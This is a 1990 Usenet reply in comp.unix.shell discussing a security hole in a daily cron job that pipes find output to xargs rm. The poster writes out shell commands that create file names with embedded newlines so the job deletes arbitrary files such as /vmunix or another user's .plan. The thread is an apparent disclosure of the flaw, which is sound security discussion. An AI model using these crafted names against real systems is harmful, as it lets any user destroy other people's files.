Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!wuarchive!udel!princeton!stone.Princeton.EDU!pfalstad
From: pfalstad@stone.Princeton.EDU (Paul John Falstad)
Newsgroups: comp.unix.shell
Subject: Re: Beware xargs security holes
Message-ID: <3369@idunno.Princeton.EDU>
Date: 16 Oct 90 19:12:06 GMT
References: <4062:Oct1518:22:1290@kramden.acf.nyu.edu> <3876@awdprime.UUCP> <13569:Oct1617:00:0590@kramden.acf.nyu.edu>
Sender: news@idunno.Princeton.EDU
Organization: Princeton University, Princeton, New Jersey
Lines: 40

In article <13569:Oct1617:00:0590@kramden.acf.nyu.edu> brnstnd@kramden.acf.nyu.edu (Dan Bernstein) writes:
>In article <3876@awdprime.UUCP> tif@doorstop.austin.ibm.com (Paul Chamberlain) writes:
>> In article <4062:Oct1518:22:1290@kramden.acf.nyu.edu> brnstnd@kramden.acf.nyu.edu (Dan Bernstein) writes:
>> >  find / -name '#*' -atime +7 -print | xargs rm
>> The most malicious thing I can do with the above command is
>> remove a file that doesn't start with '#' that's in a
>> writable directory.
>Incorrect. If that command is run daily from cron, as it is on many
>systems, then any user can remove any file on the system.

Oh, I see.  You could do something like this:

$ echo >'#
vmunix'

And then cron would delete /vmunix.  That's assuming cron starts up xargs
with / as its current directory.

And to delete other files (not necessarily in /), you could do:

$ mkdir '#
'
$ cd '#
'
$ mkdir u; mkdir u/subbarao
$ mkdir u/subbarao/.plan'
'
$ date >u/subbarao/.plan'
/#foo'

If you do a find . -name '#*' -print | xargs echo in this directory, you get:

./# ./# /u/subbarao/.plan /#foo ./# vmunix

Very nasty.  Wonder if it works on my system...

--
Paul Falstad, pfalstad@phoenix.princeton.edu PLink:HYPNOS GEnie:P.FALSTAD
"And she's always on about men following her.  I don't know what she
thinks they're going to do to her.  Vomit on her, Basil, says."-Flowery Twats